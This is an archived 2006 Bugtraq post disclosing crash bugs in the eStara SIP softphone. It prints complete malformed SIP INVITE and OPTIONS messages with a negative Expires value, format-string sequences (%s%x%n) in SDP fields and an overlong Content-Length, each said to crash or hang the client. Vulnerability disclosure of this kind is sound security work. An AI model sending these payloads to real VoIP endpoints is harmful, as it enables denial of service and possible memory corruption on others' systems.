| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 14 Feb 2006 02:42:46 -0000 From: zwell@...u.com To: bugtraq@...urityfocus.com Subject: eStara SIP softphone several message-processing vulnerabilities Visit http://www.nosec.org for more infomation SIP is the important protocol in VOIP, and I think it'll improve fast and fast in the future just like the TCP/IP. In that time, we can contact each other by VOIP for vedio and sound very cheaply. As a new protocol, most vendor just consider the usable and efficiency but not the security. Think about the scene : everybody use a SIP phone(not only software but also hardware) instead of PSTN phone, then our phone be hacked, then we leak accounts. Another important, if we use a softphone, then our OS be hacked, losing everything... -_- I have posted some SIP vulnerabilities here before, but it's just beginning, later, more and more hackers research in it, and more and more vulnerabilities be diged. What I do now is remind the Vendor to regard this problem. Ok, look at these vulnerabilities, there are all tested on all version: 1. Processing negative integer in "Expires" item vulnerability: ====================1====================== OPTIONS sip:a@....0.0.1 SIP/2.0 Via: SIP/2.0/UDP 172.16.3.6:3334;branch=z9hG4bK00001793z9hG4bK.00001FDB From: 1793 <sip:a@....0.0.1>;tag=1793 To: zwell <sip:a@....0.0.1> Call-ID: 1407@....16.3.6 CSeq: 5185 OPTIONS Expires: -127 =========================================== It will be crash. 2. Several vulnerabilitites when processing format string in SDP ====================1====================== INVITE sip:a@....0.0.1 SIP/2.0 Via: SIP/2.0/UDP 172.16.3.6:3333;branch=z9hG4bK00003013z9hG4bK.00003B37 From: 3013 <sip:a@....0.0.1>;tag=3013 To: zwell <sip:a@....0.0.1> Call-ID: 1295@....16.3.6 CSeq: 21086 INVITE Content-Type: application/sdp Content-Length: 134 v=0 o=3013 3013 3013 %s%x%n IP4 172.16.3.6 s=Session SDP c=IN IP4 172.16.3.6 t=0 0 m=audio 9876 RTP/AVP 0 a=rtpmap:0 PCMU/8000 =========================================== INVITE sip:a@....0.0.1 SIP/2.0 Via: SIP/2.0/UDP 172.16.3.6:3333;branch=z9hG4bK00003013z9hG4bK.00003B37 From: 3013 <sip:a@....0.0.1>;tag=3013 To: zwell <sip:a@....0.0.1> Call-ID: 1295@....16.3.6 CSeq: 21086 INVITE Content-Type: application/sdp Content-Length: 134 %s=0 o=4085 4085 4085 IN IP4 172.16.3.6 s=Session SDP c=IN IP4 172.16.3.6 t=0 0 m=audio 9876 %s%x%n 0 a=rtpmap:0 PCMU/8000 =========================================== It will be have no response. 3. Processing number length in "Content-Length" item vulnerability: if the length of "Content-Length" more than 9: =========================================== INVITE sip:a@....0.0.1 SIP/2.0 Via: SIP/2.0/UDP 172.16.3.6:3333;branch=z9hG4bK00002386z9hG4bK.0000234E From: 2386 <sip:a@....0.0.1>;tag=2386 To: zwell <sip:a@....0.0.1> Call-ID: 31442@....16.3.6 CSeq: 4896 INVITE Content-Type: application/sdp Content-Length: 1111111111 v=0 o=2386 2386 2386 IN IP4 172.16.3.6 s=Session SDP c=IN IP4 172.16.3.6 t=0 0 m=audio 9876 RTP/AVP 0 a=rtpmap:0 PCMU/8000 =========================================== It will be crash.
Powered by blists - more mailing lists